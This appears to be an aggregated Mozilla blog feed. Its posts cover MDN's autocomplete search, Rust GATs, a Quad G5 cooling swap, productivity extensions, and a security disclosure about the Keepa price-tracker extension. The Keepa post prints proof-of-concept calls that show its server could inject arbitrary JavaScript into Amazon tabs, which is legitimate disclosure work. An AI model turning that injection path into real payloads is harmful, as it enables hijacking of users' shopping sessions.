Hacks.Mozilla.Org: How MDN’s autocomplete search works

Last month, Gregor Weber and I added an autocomplete search to MDN Web Docs that allows you to quickly jump straight to the document you’re looking for by typing parts of the document title. This is the story of how it’s implemented. If you stick around to the end, I’ll share an “easter egg” feature that, once you’ve learned it, will make you look really cool at dinner parties. Or perhaps you just want to navigate MDN faster than mere mortals.

MDN's autocomplete search in action

In its simplest form, the input field has an onkeypress event listener that filters through a complete list of every single document title (per locale). At the time of writing, there are 11,690 different document titles (and their URLs) for English US. You can see a preview by opening https://developer.mozilla.org/en-US/search-index.json. Yes, it’s huge, but it’s not too huge to load into memory. After all, together with the code that does the searching, it’s only loaded when the user has indicated intent to type something. And speaking of size, because the file is compressed with Brotli, it’s only 144KB over the network.

Implementation details

By default, the only JavaScript code that’s loaded is a small shim that watches for onmouseover and onfocus on the search <input> field. There’s also an event listener on the whole document that looks for a certain keystroke. Pressing / at any point acts the same as if you had used your mouse cursor to put focus into the <input> field. As soon as focus is triggered, the first thing it does is download two JavaScript bundles which turn the <input> field into something much more advanced. In its simplest (pseudo) form, here’s how it works:

<input
 type="search"
 name="q"
 onfocus="startAutocomplete()"
 onmouseover="startAutocomplete()"
 placeholder="Site search..."
 value="">

let started = false;
function startAutocomplete() {
  if (started) {
    return;
  }
  started = true; // make sure the bundle is only injected once
  const script = document.createElement("script");
  script.src = "/static/js/autocomplete.js";
  document.head.appendChild(script);
}

Then it loads /static/js/autocomplete.js which is where the real magic happens. Let’s dig deeper with the pseudo code:

(async function() {
  const response = await fetch('/en-US/search-index.json');
  const documents = await response.json();
  
  const inputValue = document.querySelector(
    'input[type="search"]'
  ).value;
  const flex = FlexSearch.create();
  documents.forEach(({ title }, i) => {
    flex.add(i, title);
  });

  const indexResults = flex.search(inputValue);
  const foundDocuments = indexResults.map((index) => documents[index]);
  displayFoundDocuments(foundDocuments.slice(0, 10));
})();

As you can probably see, this is an oversimplification of how it actually works, but it’s not yet time to dig into the details. The next step is to display the matches. We use (TypeScript) React to do this, but the following pseudo code is easier to follow:

function displayFoundDocuments(documents) {
  const container = document.createElement("ul");
  documents.forEach(({url, title}) => {
    const row = document.createElement("li");
    const link = document.createElement("a");
    link.href = url;
    link.textContent = title;
    row.appendChild(link);
    container.appendChild(row);
  });
  document.querySelector('#search').appendChild(container);
}

Then with some CSS, we display this as an overlay just beneath the <input> field. We highlight each title according to the inputValue, and various keystroke event handlers take care of highlighting the relevant row when you navigate up and down.
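For the highlighting, a minimal sketch (an illustration, not the exact MDN code) could wrap the first case-insensitive occurrence of the typed value in a <mark> element:

// Hypothetical helper, not the actual Yari implementation.
function highlightTitle(title, inputValue) {
  const start = title.toLowerCase().indexOf(inputValue.toLowerCase());
  if (start === -1) return title;
  const end = start + inputValue.length;
  return (
    title.slice(0, start) +
    "<mark>" + title.slice(start, end) + "</mark>" +
    title.slice(end)
  );
}

highlightTitle("Array.prototype.forEach()", "foreac");
// "Array.prototype.<mark>forEac</mark>h()"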

Ok, let’s dig deeper into the implementation details

We create the FlexSearch index just once and re-use it for every new keystroke. Because the user might type more while waiting for the network, the search is reactive: it only executes once all the JavaScript and the JSON have arrived, and then uses whatever the current input value is.
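Sketched out with illustrative names (an assumption about the shape of the code, not the actual Yari implementation), the flow looks something like this:

const input = document.querySelector('input[type="search"]');

let flex = null;
let documents = null;
let pendingQuery = "";

async function ensureIndex() {
  // Build the FlexSearch index only once; every later keystroke re-uses it.
  // (A real implementation would also guard against overlapping fetches.)
  if (!flex) {
    const response = await fetch("/en-US/search-index.json");
    documents = await response.json();
    flex = FlexSearch.create();
    documents.forEach(({ title }, i) => flex.add(i, title));
  }
}

input.addEventListener("input", async () => {
  pendingQuery = input.value;
  await ensureIndex();
  // By the time the index is ready, pendingQuery holds whatever the user
  // typed most recently, so we never search on stale keystrokes.
  const indexResults = flex.search(pendingQuery);
  const foundDocuments = indexResults.map((index) => documents[index]);
  displayFoundDocuments(foundDocuments.slice(0, 10));
});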

Before we dig into what this FlexSearch is, let’s talk about how the display actually works. For that we use a React library called downshift, which handles all the interactions and the display, and makes sure the displayed search results are accessible. downshift is a mature library that handles a myriad of challenges with building a widget like that, especially the aspects of making it accessible.

So, what is this FlexSearch library? It’s another third-party library, one that makes sure searching on titles is done with natural language in mind. It describes itself as the “Web’s fastest and most memory-flexible full-text search library with zero dependencies.” This is a lot more performant and accurate than simply looking for one string inside a long list of other strings.

Deciding which result to show first

In fairness, if the user types foreac, it’s not that hard to reduce a list of 10,000+ document titles down to only those that contain foreac in the title; the harder part is deciding which result to show first. The way we implement that relies on pageview stats. We record pageviews for every single MDN URL as a way of determining “popularity”. The documents that most people decide to arrive on are most probably the ones the user was searching for.

Our build process that generates the search-index.json file knows about each URL’s number of pageviews. We actually don’t care about absolute numbers, but we do care about the relative differences. For example, we know that Array.prototype.forEach() (that’s one of the document titles) is a more popular page than TypedArray.prototype.forEach(), so we leverage that and sort the entries in search-index.json accordingly. Now, with FlexSearch doing the reduction, we use the “natural order” of the array as the trick that tries to give users the document they were probably looking for. It’s actually the same technique we use for Elasticsearch in our full site-search. More about that in: How MDN’s site-search works.
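As a sketch of what that build step might do (the field names here are assumptions for illustration):

// Sort by pageview-based popularity, so that the array order of
// search-index.json reflects which documents people actually visit.
const entries = [
  {
    title: "TypedArray.prototype.forEach()",
    url: "/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray/forEach",
    popularity: 0.0025,
  },
  {
    title: "Array.prototype.forEach()",
    url: "/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/forEach",
    popularity: 0.9,
  },
];
entries.sort((a, b) => b.popularity - a.popularity);
// Only title and url are emitted; the array order itself encodes popularity.
const searchIndex = entries.map(({ title, url }) => ({ title, url }));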

The easter egg: How to search by URL

Actually, it’s not a whimsical easter egg, but a feature that came from the fact that this autocomplete needs to work for our content creators. You see, when you work on the content in MDN you start a local “preview server”, which is a complete copy of all documents running locally, as a static site, under http://localhost:5000. There, you don’t want to rely on a server to do searches. Content authors need to move quickly between documents, which is much of the reason why the autocomplete search is done entirely in the client.

In tools like the VSCode and Atom IDEs, you can do “fuzzy searches” to find and open files simply by typing portions of the file path. For example, searching for whmlemvo should find the file files/web/html/element/video. You can do that with MDN’s autocomplete search too. The way you do it is by typing / as the first input character.

Activate "fuzzy search" on MDN

It makes it really quick to jump straight to a document if you know its URL but don’t want to spell it out exactly.
In fact, there’s another way to navigate and that is to first press / anywhere when browsing MDN, which activates the autocomplete search. Then you type / again, and you’re off to the races!
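At its core, this style of matching can be as simple as checking that the typed characters appear in order within the URL. Here’s a minimal sketch; the real implementation in Yari is more involved and also scores the matches:

// Returns true if every character of `query` appears in `url`, in order.
function fuzzyMatch(query, url) {
  let i = 0;
  for (const char of url) {
    if (char === query[i]) i++;
    if (i === query.length) return true;
  }
  return false;
}

fuzzyMatch("whmlemvo", "files/web/html/element/video"); // true
fuzzyMatch("whmlemvo", "files/web/css/color"); // false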

How to get really deep into the implementation details

The code for all of this is in the Yari repo which is the project that builds and previews all of the MDN content. To find the exact code, click into the client/src/search.tsx source code and you’ll find all the code for lazy-loading, searching, preloading, and displaying autocomplete searches.


The Rust Programming Language Blog: The push for GATs stabilization

Where to start, where to start...

Let's begin by saying: this is a very exciting post. Some people reading this will be overwhelmingly thrilled; some will have no idea what GATs (generic associated types) are; others might be in disbelief. The RFC for this feature did get opened in April of 2016 (and merged about a year and a half later). In fact, this RFC even predates const generics (an MVP of which was recently stabilized). Don't let this fool you though: it is a powerful feature, and the reactions to the tracking issue on GitHub should maybe give you an idea of its popularity (it is the most upvoted issue on the Rust repository).

If you're not familiar with GATs, they allow you to define type, lifetime, or const generics on associated types. Like so:

trait Foo {
    type Bar<'a>;
}

Now, this may seem underwhelming, but I'll go into more detail later as to why this really is a powerful feature.

But for now: what exactly is happening? Well, nearly four years after its RFC was merged, the generic_associated_types feature is no longer "incomplete."

crickets chirping

Wait...that's it?? Well, yes! I'll go into a bit of detail later in this blog post as to why this is a big deal. But, long story short, a good number of changes have had to be made to the compiler to get GATs to work. And, while there are still a few small remaining diagnostics issues, the feature is finally in a state where we feel comfortable making it no longer "incomplete".

So, what does that mean? Well, all it really means is that when you use this feature on nightly, you'll no longer get the "generic_associated_types is incomplete" warning. However, the real reason this is a big deal: we want to stabilize this feature. But we need your help. We need you to test this feature, to file issues for any bugs you find or for potential diagnostic improvements. Also, we'd love for you to just tell us about some interesting patterns that GATs enable over on Zulip!

Without making promises that we aren't 100% sure we can keep, we have high hopes we can stabilize this feature within the next couple months. But, we want to make sure we aren't missing glaringly obvious bugs or flaws. We want this to be a smooth stabilization.

Okay. Phew. That's the main point of this post and the most exciting news. But as I said before, I think it's also reasonable for me to explain what this feature is, what you can do with it, and some of the background and how we got here.

So what are GATs?

Note: this will only be a brief overview. The RFC contains many more details.

GATs (generic associated types) were originally proposed in RFC 1598. As said before, they allow you to define type, lifetime, or const generics on associated types. If you're familiar with languages that have "higher-kinded types", then you could call GATs type constructors on traits. Perhaps the easiest way for you to get a sense of how you might use GATs is to jump into an example.

Here is a popular use case: a LendingIterator (formerly known as a StreamingIterator):

trait LendingIterator {
    type Item<'a> where Self: 'a;

    fn next<'a>(&'a mut self) -> Option<Self::Item<'a>>;
}

Let's go through one implementation of this, a hypothetical <[T]>::windows_mut, which allows for iterating through overlapping mutable windows on a slice. If you were to try to implement this with Iterator today like

struct WindowsMut<'t, T> {
    slice: &'t mut [T],
    start: usize,
    window_size: usize,
}

impl<'t, T> Iterator for WindowsMut<'t, T> {
    type Item = &'t mut [T];

    fn next<'a>(&'a mut self) -> Option<Self::Item> {
        let retval = self.slice[self.start..].get_mut(..self.window_size)?;
        self.start += 1;
        Some(retval)
    }
}

then you would get an error.

error[E0495]: cannot infer an appropriate lifetime for lifetime parameter in function call due to conflicting requirements
  --> src/lib.rs:9:22
   |
9  |         let retval = self.slice[self.start..].get_mut(..self.window_size)?;
   |                      ^^^^^^^^^^^^^^^^^^^^^^^^
   |
note: first, the lifetime cannot outlive the lifetime `'a` as defined on the method body at 8:13...
  --> src/lib.rs:8:13
   |
8  |     fn next<'a>(&'a mut self) -> Option<Self::Item> {
   |             ^^
note: ...so that reference does not outlive borrowed content
  --> src/lib.rs:9:22
   |
9  |         let retval = self.slice[self.start..].get_mut(..self.window_size)?;
   |                      ^^^^^^^^^^
note: but, the lifetime must be valid for the lifetime `'t` as defined on the impl at 6:6...
  --> src/lib.rs:6:6
   |
6  | impl<'t, T: 't> Iterator for WindowsMut<'t, T> {
   |      ^^

Put succinctly, this error is essentially telling us that in order for us to be able to return a reference to self.slice, it must live as long as 'a, which would require a 'a: 't bound (which we can't provide). Without this, we could call next while already holding a reference to the slice, creating overlapping mutable references. However, it does compile fine if you were to implement this using the LendingIterator trait from before:

impl<'t, T> LendingIterator for WindowsMut<'t, T> {
    type Item<'a> where Self: 'a = &'a mut [T];

    fn next<'a>(&'a mut self) -> Option<Self::Item<'a>> {
        let retval = self.slice[self.start..].get_mut(..self.window_size)?;
        self.start += 1;
        Some(retval)
    }
}
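To see the payoff, here is a hypothetical usage sketch (on nightly, with the feature gate enabled), building on the definitions above. Each window borrows the iterator for just one loop iteration, which is exactly what the lifetime parameter on Item expresses:

fn main() {
    let mut buf = [0, 1, 2, 3, 4];
    let mut windows = WindowsMut { slice: &mut buf, start: 0, window_size: 2 };
    // Each call to `next` reborrows `windows` only for the duration of
    // the loop body, so overlapping mutable windows are perfectly safe.
    while let Some(window) = windows.next() {
        window[0] += 10;
    }
    assert_eq!(buf, [10, 11, 12, 13, 4]);
}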

As an aside, there's one thing to note about this trait and impl that you might be curious about: the where Self: 'a clause on Item. Briefly, this allows us to use &'a mut [T]; without this where clause, someone could try to return Self::Item<'static> and extend the lifetime of the slice. We understand that this is a point of confusion sometimes and are considering potential alternatives, such as always assuming this bound or implying it based on usage within the trait (see this issue). We definitely would love to hear about your use cases here, particularly when assuming this bound would be a hindrance.

As another example, imagine you wanted a struct to be generic over a pointer to a specific type. You might write the following code:

trait PointerFamily {
    type Pointer<T>: Deref<Target = T>;

    fn new<T>(value: T) -> Self::Pointer<T>;
}

struct ArcFamily;
struct RcFamily;

impl PointerFamily for ArcFamily {
    type Pointer<T> = Arc<T>;
    ...
}
impl PointerFamily for RcFamily {
    type Pointer<T> = Rc<T>;
    ...
}

struct MyStruct<P: PointerFamily> {
    pointer: P::Pointer<String>,
}

We won't go in-depth on the details here, but this example is nice in that it not only highlights the use of types in GATs, but also shows that you can still use the trait bounds that you already can use on associated types.
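Still, as a quick hypothetical usage sketch (assuming the elided new implementations simply wrap Rc::new and Arc::new), the same MyStruct works with either pointer family:

fn main() {
    // RcFamily::new comes from the PointerFamily trait; the elided impl
    // presumably just calls Rc::new(value).
    let my_struct = MyStruct::<RcFamily> {
        pointer: RcFamily::new(String::from("hello")),
    };
    // The Deref<Target = T> bound lets us treat the pointer like a &String.
    assert_eq!(my_struct.pointer.len(), 5);
}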

These two examples only scratch the surface of the patterns that GATs support. If you find any that seem particularly interesting or clever, we would love to hear about them over on Zulip!

Why has it taken so long to implement this?

So what has caused us to have taken nearly four years to get to the point that we are now? Well, it's hard to put into words how much the existing trait solver has had to change and adapt; but, consider this: for a while, it was thought that to support GATs, we would have to transition rustc to use Chalk, a potential future trait solver that uses logical predicates to solve trait goals (though, while some progress has been made, it's still very experimental even now).

For reference, here are some various implementation additions and changes that have been made that have furthered GAT support in some way or another:

  • Parsing GATs in AST (#45904)
  • Resolving lifetimes in GATs (#46706)
  • Initial trait solver work to support lifetimes (#67160)
  • Validating projection bounds (and making changes that allow type and const GATs) (#72788)
  • Separating projection bounds and predicates (#73905)
  • Allowing GATs in trait paths (#79554)
  • Partially replace leak check with universes (#65232)
  • Move leak check to later in trait solving (#72493)
  • Replacing bound vars in GATs with placeholders when projecting (#86993)

And to further emphasize the work above: many of these PRs are large and have considerable design work behind them. There are also several smaller PRs along the way. But, we made it. And I just want to congratulate everyone who's put effort into this one way or another. You rock.

What limitations are there currently?

Ok, so now comes the part that nobody likes hearing about: the limitations. Fortunately, in this case, there's really only one GAT limitation: traits with GATs are not object safe. This means you won't be able to do something like

fn takes_iter(_: &mut dyn for<'a> LendingIterator<Item<'a> = &'a i32>) {}

The biggest reason for this decision is that there's still a bit of design and implementation work to actually make this usable. And while this is a nice feature, adding it in the future would be a backward-compatible change. We feel that it's better to get most of GATs stabilized and then come back and try to tackle this later than to block GATs for even longer. Also, GATs without object safety are still very powerful, so we don't lose much by deferring this.

As was mentioned earlier in this post, there are still a couple remaining diagnostics issues. If you do find bugs though, please file issues!

Wladimir Palant: Data exfiltration in Keepa Price Tracker

As readers of this blog might remember, shopping assistants aren’t exactly known for their respect for your privacy. They will typically use their privileged access to your browser in order to extract data. For them, this ability is a competitive advantage. You pay for a free product with a privacy hazard.

Usually, the vendor will claim to anonymize all data, a claim that can rarely be verified. Even if the anonymization actually happens, it’s really hard to do this right. If anonymization can be reversed and the data falls into the wrong hands, this can have severe consequences for a person’s life.

Meat grinder with the Keepa logo on its side working on the Amazon logo, producing lots of prices and stars (Image credits: Keepa, palomaironique, Nikon1803)

Today we will take a closer look at a browser extension called “Keepa – Amazon Price Tracker” which is used by at least two million users across different browsers. The extension is produced by a German company, and its privacy policy is refreshingly short and concise, suggesting that no unexpected data collection is going on. The reality however is: not only will this extension extract data from your Amazon sessions, it will even use your bandwidth to load various Amazon pages in the background.

The server communication

The Keepa extension keeps a persistent WebSocket connection open to its server dyn.keepa.com. The connection parameters include your unique user identifier, stored both in the extension and as a cookie on keepa.com. As a result, this identifier will survive both clearing browsing data and reinstalling the extension; you’d have to do both for it to be cleared. If you choose to register on keepa.com, this identifier will also be tied to your user name and email address.

Looking at the messages being exchanged, you’ll see that these are binary data. But they aren’t encrypted; it’s merely deflate-compressed JSON data.

Developer tools showing binary messages being exchanged

You can see the original message contents by copying the message as a Base64 string, then running the following code in the context of the extension’s background page:

pako.inflate(atob("eAGrViouSSwpLVayMjSw0FFQylOyMjesBQBQGwZU"), {to: "string"});

This will display the initial message sent by the server:

{
  "status": 108,
  "n": 71
}

What does Keepa learn about your browsing?

Whenever I open an Amazon product page, a message like the following is sent to the Keepa server:

{
  "payload": [null],
  "scrapedData": {
    "tld": "de"
  },
  "ratings": [{
    "rating": "4,3",
    "ratingCount": "2.924",
    "asin": "B0719M4YZB"
  }],
  "key": "f1",
  "domainId": 3
}

This tells the server that I am using Amazon Germany (the value 3 in domainId stands for .de, 1 would have been .com). It also indicates the product I viewed (asin field) and how it was rated by Amazon users. Depending on the product, additional data like the sales rank might be present here. Also, the page scraping rules are determined by the server and can change any time to collect more sensitive data.

A similar message is sent when an Amazon search is performed. The only difference here is that the ratings array contains multiple entries, one for each article in your search results. While the search string itself isn’t being transmitted (not with the current scraping rules at least), from the search results it’s trivial to deduce what you searched for.

Extension getting active on its own

That’s not the end of it however. The extension will also regularly receive instructions like the following from the server (shortened for clarity):

{
  "key": "o1",
  "url": "https://www.amazon.de/gp/aod/ajax/ref=aod_page_2?asin=B074DDJFTH&…",
  "isAjax": true,
  "httpMethod": 0,
  "domainId": 3,
  "timeout": 8000,
  "scrapeFilters": [{
    "sellerName": {
      "name": "sellerName",
      "selector": "#aod-offer-soldBy div.a-col-right > a:first-child",
      "altSelector": "#aod-offer-soldBy .a-col-right span:first-child",
      "attribute": "text",
      "reGroup": 0,
      "multiple": false,
      "optional": true,
      "isListSelector": false,
      "parentList": "offers",
      "keepBR": false
    },
    "rating": {
      "name": "rating",
      "selector": "#aod-offer-seller-rating",
      "attribute": "text",
      "regExp": "(\\d{1,3})\\s?%",
      "reGroup": 1,
      "multiple": false,
      "optional": true,
      "isListSelector": false,
      "parentList": "offers",
      "keepBR": false
    },
    …
  }],
  "l": [{
    "path": ["chrome", "webRequest", "onBeforeSendHeaders", "addListener"],
    "index": 1,
    "a": {
      "urls": ["<all_urls>"],
      "types": ["main_frame", "sub_frame", "stylesheet", "script", …]
    },
    "b": ["requestHeaders", "blocking", "extraHeaders"]
  }, …, null],
  "block": "(https?:)?\\/\\/.*?(\\.gif|\\.jpg|\\.png|\\.woff2?|\\.css|adsystem\\.)\\??"
}

The address https://www.amazon.de/gp/aod/ajax/ref=aod_page_2?asin=B074DDJFTH belongs to an air compressor, not a product I’ve ever looked at but one that Keepa is apparently interested in. The extension will now attempt to extract data from this page despite me not navigating to it. Because the isAjax flag is set here, this address is loaded via XMLHttpRequest, after which the response text is put into a frame of the extension’s background page. If the isAjax flag weren’t set, this page would be loaded directly into another frame.

The scrapeFilters key sets the rules to be used for analyzing the page. This will extract ratings, prices, availability and any other information via CSS selectors and regular expressions. Here Keepa is also interested in the seller’s name; elsewhere, in the shipping information and security tokens. There is also functionality here to read out the contents of the Amazon cart, though I didn’t look too closely at that.

The l key is also interesting. It tells the extension’s background page to call a particular method with the given parameters; here the chrome.webRequest.onBeforeSendHeaders.addListener method is being called. The index key determines which of the predefined listeners should be used. The purpose of the predefined listeners seems to be removing some security headers as well as making sure headers like Cookie are set correctly.
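To make that mechanism more concrete, here is a hypothetical reconstruction (not Keepa’s actual code) of how the background page could dispatch such an instruction:

// Hypothetical reconstruction for illustration only.
// predefinedListeners is an array of functions shipped with the extension;
// the server merely picks one by index and supplies the other arguments.
function applyInstruction(instruction, predefinedListeners) {
  // Resolve ["chrome", "webRequest", "onBeforeSendHeaders", "addListener"]
  // to the addListener function, keeping its parent as the `this` value.
  let parent = window;
  let target = window;
  for (const part of instruction.path) {
    parent = target;
    target = target[part];
  }
  // Equivalent to: chrome.webRequest.onBeforeSendHeaders.addListener(
  //   listener, instruction.a, instruction.b)
  target.call(parent, predefinedListeners[instruction.index], instruction.a, instruction.b);
}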

The server’s effective privileges

Let’s take a closer look at the privileges granted to the Keepa server here; these aren’t entirely obvious. Loading pages in the background isn’t meant to happen within the user’s usual session; there is some special cookie handling meant to produce a separate session for scraping only. This doesn’t appear to always work reliably, and I am fairly certain that the server can make pages load in the usual Amazon session, rendering it capable of impersonating the user towards Amazon. As the server can also extract arbitrary data, it is for example entirely possible to add a shipping address to the user’s Amazon account and to place an order that will be shipped there.

The l key is also worth a second look. At first the impact here seems limited by the fact that the first parameter will always be a function, one out of a few possible functions. But the server could use that functionality to call eval.call(function(){}, "alert(1)") in the context of the extension’s background page and execute arbitrary JavaScript code. Luckily, this call doesn’t succeed thanks to the extension’s default Content Security Policy.

But there are more possible calls, and some of these succeed. For example, the server could tell the extension to call chrome.tabs.executeScript.call(function(){}, {code: "alert(1)"}). This will execute arbitrary JavaScript code in the current tab if the extension has access to it (meaning any Amazon website). It would also be possible to specify a tab identifier in order to inject JavaScript into background tabs: chrome.tabs.executeScript.call(function(){}, 12, {code: "alert(1)"}). For this the server doesn’t need to know which tabs are open: tab identifiers are sequential, so it’s possible to find valid tab identifiers simply by trying out potential candidates.

Privacy policy

Certainly, a browser extension collecting all this data will have a privacy policy to explain how this data is used? Here is the privacy policy of the Germany-based Keepa GmbH in full:

You can use all of our services without providing any personal information. However, if you do so we will not sell or trade your personal information under any circumstance. Setting up a tracking request on our site implies that you’d like us to contact you via the contact information you provided us. We will do our best to only do so if useful and necessary - we hate spam as much as you do. If you login/register using Social-Login or OpenID we will only save the username and/or email address of the provided data. Should you choose to subscribe to one of our fee-based subscriptions we will share your email and billing address with the chosen payment provider - solely for the purpose of payment related communication and authentication. You can delete all your information by deleting your account through the settings.

This doesn’t sound right. Despite being linked under “Privacy practices” in the Chrome Web Store, it appears to apply only to the Keepa website, not to any of the extension functionality. The privacy policy on the Mozilla Add-ons site is more specific despite also being remarkably short (formatting of the original preserved):

You can use this add-on without providing any personal information. If you do opt to share contact information, we will only use it to provide you updates relevant to your tracking requests. Under no circumstances will your personal information be made available to a third party. This add-on does not collect any personal data beyond the contact information provided by you.

Whenever you visit an Amazon product page the ASIN (Amazon Standard Identification Number) of that product is used to load its price history graph from Keepa.com. We do not log such requests.

The extension creates required functional cookies containing a session and your settings on Keepa.com, which is required for session management (storing settings and accessing your Keepa.com account, if you create one). No other (tracking, advertising) cookies are created.

This refers to some pieces of the Keepa functionality but it once again completely omits the data collection outlined here. It’s reassuring to know that they don’t log product identifiers when showing product history, but they don’t need to if on another channel their extension sends far more detailed data to the server. This makes the first sentence, formatted as bold text, a clear lie. Unless of course you don’t consider the information collected here personal. I’m not a lawyer, maybe in the legal sense it isn’t.

I’m fairly certain however that this privacy policy doesn’t meet the legal requirements of the GDPR. To be compliant it would need to mention the data being collected, explain the legal grounds for doing so, how it is being used, how long it is being kept and who it is shared with.

That said, this isn’t the only regulation violated by Keepa. As a German company, they are obliged to publish a legal note (in German: Impressum) on their website so that visitors can immediately recognize the party responsible. Keepa hides both this information and the privacy policy in a submenu (one has to click “Information” first) under the misleading name “Disclaimer.” The legal requirements are for both pages to be reachable with one click, and the link title needs to be unambiguous.

Conclusions

The Keepa extension is equipped to collect any information about your Amazon visits. Currently it will collect information about the products you look at and the ones you search for, all of it tied to a unique and persistent user identifier. Even without you choosing to register on the Keepa website, there is considerable potential for the collected data to be deanonymized.

Some sloppy programming had the (likely unintended) consequence of making the server even more powerful, essentially granting it full control over any Amazon page you visit. Luckily, the extension’s privileges don’t give it access to any websites beyond Amazon.

The company behind the extension fails to comply with its legal obligations. The privacy policy is misleading in claiming that no personal data is being collected. It fails to explain how the data is being used and who it is shared with. There are certainly companies interested in buying detailed online shopping profiles, and a usable privacy policy needs to at least exclude the possibility of the data being sold.

Cameron Kaiser: And now for something completely different: "Upgrading" your Quad G5 LCS

One of the most consistently popular old posts on this blog is our discussion on long-life computing and how to extend the working, arguably even useful, life of your Power Mac. However, what I think gives it particular continued traction is it has a section on how to swap out the liquid cooling system of the Quad G5, obviously the most powerful Power Macintosh ever made and one of the only two G5 systems I believe worth using (the other being the dual-processor 2.3GHz, as it is aircooled). LCSes are finicky beasts under the best of conditions and certain liquid-cooled models of the G5 line have notoriously bad reputations for leakage. My parents' dual 2.5GHz, for example, succumbed to a leak and it ended up being a rather ugly postmortem.

The Quad G5 is one of the better ones in this regard and most of the ones that would have suffered early deaths already have, but it still requires service due to evaporative losses and sediment, and any Quad on its original processors is by now almost certainly a windtunnel under load. An ailing LCS, even an intact one, runs the real risk of an unexpected shutdown if the CPU it can no longer cool effectively ends up exceeding its internal thermal limits; you'll see a red OVERTEMP light illuminate on the logic board when this is imminent, followed by a CHECKSTOP. Like an automotive radiator it is possible to open the LCS up and flush the coolant (and potentially service the pumps), but this is not a trivial process. Additionally, those instructions are for the single-pump Delphi version 1 assembly, which is the more reliable of the two; the less reliable double-pump Cooligy version 2 assemblies are even harder to work on.

Unfortunately our current employment situation requires I downsize, so I've been starting on consolidating or finding homes for excess spare systems. I had several spare Quad G5 systems in storage in various states, all version 2 Cooligy LCSes, but the only LCS assemblies I have in stock (and the LCS in my original Quad G5) are version 1. These LCSes were bought Apple Certified Refurbished, so they were known to be in good condition and ready to go; as the spare Quads were all on their original marginal LCSes and processors, I figured I would simply "upgrade" the best-condition v2 G5 with a v1 assembly. The G5 service manual doesn't say anything about this, though it has nothing in it indicating that they aren't interchangeable, or that they need different logic boards or ROMs, and now having done it I can attest that it "just works." So here's a few things to watch out for.

Both the v1 and the v2 assemblies have multiple sets of screws: four "captive" (not really) float plate screws, six processor mount screws, four terminal assembly screws (all of which require a 3mm flathead hex driver), and four captive ballheads (4mm ballhead hex). Here's the v1, again:

And here's the v2. Compare and contrast.
The float plate screws differ between the two versions, and despite the manual calling them "captive" can be inadvertently removed. If your replacement v1 doesn't have float plate screws in it, as mine didn't, the system will not boot unless they are installed (along with the terminal assembly screws, which are integral portions of the CPU power connections). I had to steal them from a dead G5 core module that I fortunately happen to have kept.

Once installed, the grey inlet frame used in the v2 doesn't grip the v1:

The frame is not a necessary part. You can leave it out as the front fan module and clear deflector are sufficient to direct airflow. However, if you have a spare v1 inlet frame, you can install that; the mounting is the same.

The fan and pump connector cable is also the same between v1 and v2, though you may need to move the cable around a bit to get the halves to connect if it was in a wacky location.

Now run thermal calibration, and enjoy your renewed Apple PowerPC tank.

Firefox Add-on Reviews: Supercharge your productivity with a browser extension

With more work and education happening online (and at home) you may find yourself needing new ways to juice your productivity. From time management to organizational tools and more, the right browser extension can give you an edge in the art of efficiency. 

I need help saving and organizing a lot of web content 

Gyazo

Capture, save, and share anything you find on the web. Gyazo is a great tool for personal or collaborative record keeping and research. 

Clip entire pages or just pertinent portions. Save images or take screenshots. Gyazo makes it easy to perform any type of web clipping action by either right-clicking on the page element you want to save or using the extension’s toolbar button. Everything gets saved to your Gyazo account, making it accessible across devices and collaborative teams. 

On your Gyazo homepage you can easily browse and sort everything you’ve clipped, and organize it all into shareable topics or collections.

With its minimalist pop-up interface, Gyazo makes it easy to clip elements, sections, or entire web pages.

Evernote Web Clipper

Similar to Gyazo, Evernote Web Clipper offers a kindred feature set—clip, save, and share web content—albeit with some nice user interface distinctions. 

Evernote places emphasis on making it easy to annotate images and articles for collaborative purposes. It also has a strong internal search feature, allowing you to search for specific words or phrases that might appear across scattered groupings of clipped content. Evernote also automatically strips out ads and social widgets on your saved pages. 

Focus! Focus! Focus!

Anti-distraction extensions can be a major boon for online workers and students… 

Block Site 

Do you struggle to avoid certain time-wasting, productivity-sucking websites? With Block Site you can enforce restrictions on sites that tempt you away from good work habits.

Just list the websites you want to avoid for specified periods of time (certain hours of the day, or some days entirely, etc.) and Block Site won’t let you access them until you’re out of the focus zone. There’s also a fun redirection feature that automatically sends you to a more productive website anytime you try to visit a time waster.

Give yourself a custom message of encouragement (or scolding?) whenever you try to visit a restricted site with Block Site.

LeechBlock NG

Very similar in function to Block Site, LeechBlock NG offers a few intriguing twists beyond standard site-blocking features. 

In addition to blocking sites during specified times, LeechBlock NG offers an array of granular, website-specific blocking abilities—like blocking just portions of websites (e.g. you can’t access the YouTube homepage but you can see video pages), setting restrictions on predetermined days (e.g. no Twitter on weekends), or delaying access to certain websites by 60 seconds to give you time to reconsider that potentially productivity-killing decision.

Tomato Clock

A simple but highly effective time management tool, Tomato Clock (based on the Pomodoro technique) helps you stay on task by tracking short, focused work intervals. 

The premise is simple: it assumes everyone’s productive attention span is limited, so break up your work into manageable “tomato” chunks. Let’s say you work best in 40-minute bursts. Set Tomato Clock and your browser will notify you when it’s break time (the length of which is also customizable). It’s a great way to stay focused via short sprints of productivity. The extension also keeps track of your completed tomato intervals so you can track your achieved results over time.

Tranquility Reader

Imagine a world wide web where everything but the words is stripped away—no more distracting images, ads, tempting links to related stories, nothing—just the words you’re there to read. That’s Tranquility Reader.

Simply hit the toolbar button and instantly streamline any web page. Tranquility Reader offers quite a few other nifty features as well, like the ability to save content offline for later reading, customizable font size and colors, add annotations to saved pages, and more. 

We hope some of these great extensions will give your productivity a serious boost! Fact is there are a vast number of extensions out there that could possibly help your productivity—everything from ways to organize tons of open tabs to translation tools to bookmark managers and more. 

The Mozilla Blog: 2021: The year privacy went mainstream

It’s been a hell of a year so far for data privacy. Apple has been launching broadsides at the ad-tech industry with each new big privacy feature unveiling. Google is playing catch-up, promising that Android users will also soon be able to stop apps from tracking them across the internet. Then there’s WhatsApp, going on a global PR offensive after changes to its privacy policy elicited consumer backlash.      

There’s no doubt about it, digital privacy is shaping up as the key tech battleground in 2021 and the years ahead. But how did this happen? Wasn’t digital privacy supposed to be dead and buried by now? After all, many tech CEOs and commentators have told us that a zero-privacy world was inevitable and that everyone should just get used to it. Until recently, it would have been tough to argue that they were wrong.

Over the last 18 months, events have conspired to accelerate this shift in public attitudes towards privacy from a niche concern to something much more fundamental and mainstream. In the process, more people also began to see how privacy and security are inextricably linked.

The abrupt shift to remote working prompted by COVID-19 “stay at home” orders globally was the first crank of the engine. Many of us have had to use personal devices and work in less-than-secure home environments, exposing vast swathes of corporate data to greater risk.
